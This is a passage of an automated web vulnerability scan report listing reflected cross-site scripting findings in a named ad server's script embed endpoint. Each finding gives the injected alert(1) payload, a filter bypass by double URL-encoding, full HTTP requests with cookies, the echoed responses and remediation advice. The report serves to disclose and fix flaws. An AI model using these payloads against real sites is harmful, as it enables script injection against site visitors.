Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5282%2522%253balert%25281%2529%252f%252f3ec5efad5b4 was submitted in the REST URL parameter 2. This input was echoed as f5282";alert(1)//3ec5efad5b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357f5282%2522%253balert%25281%2529%252f%252f3ec5efad5b4/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:51:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357f5282";alert(1)//3ec5efad5b4/1411.0.js.120x60/1296399087**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c
...[SNIP]...

5.92. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db472%2522%253balert%25281%2529%252f%252fcf9a3b974a6 was submitted in the REST URL parameter 3. This input was echoed as db472";alert(1)//cf9a3b974a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60db472%2522%253balert%25281%2529%252f%252fcf9a3b974a6/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:51:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60db472";alert(1)//cf9a3b974a6/1296399093**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c
...[SNIP]...

5.93. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cda5b"-alert(1)-"73a9c13756 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208cda5b"-alert(1)-"73a9c13756&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296399002**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208cda5b"-alert(1)-"73a9c13756&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980">
...[SNIP]...

5.94. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e406"-alert(1)-"7d0f2844801 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G2e406"-alert(1)-"7d0f2844801&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296398983**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G2e406"-alert(1)-"7d0f2844801&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980">
...[SNIP]...

5.95. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 974be"-alert(1)-"a93d2815993 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!974be"-alert(1)-"a93d2815993&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
c="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296398946**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!974be"-alert(1)-"a93d2815993&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980">
...[SNIP]...

5.96. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da298"-alert(1)-"52d4453bbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980&da298"-alert(1)-"52d4453bbd=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:51:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1683

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980&da298"-alert(1)-"52d4453bbd=1">
...[SNIP]...

5.97. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46172'-alert(1)-'e1abf17b2d0 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=801063946172'-alert(1)-'e1abf17b2d0&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:09 GMT; path=/
Set-Cookie: i_1=33:353:198:3:0:34115:1296351609:B2|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:40:09 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 875

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=801063946172'-alert(1)-'e1abf17b2d0&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       fu
...[SNIP]...

5.98. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Issue detail

The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25bb1'-alert(1)-'42f2cbb6b9e was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!25bb1'-alert(1)-'42f2cbb6b9e&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:00 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34115:1296351600:B2|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:40:00 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 869

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!25bb1'-alert(1)-'42f2cbb6b9e&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return
...[SNIP]...

5.99. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 325c1'-alert(1)-'2ac3f968620 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147325c1'-alert(1)-'2ac3f968620&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:49 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34115:1296351649:B2|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:40:49 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 869

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147325c1'-alert(1)-'2ac3f968620&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.writ
...[SNIP]...

5.100. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36420'-alert(1)-'70de7b5bcbb was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a36420'-alert(1)-'70de7b5bcbb HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:41:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:41:20 GMT; path=/
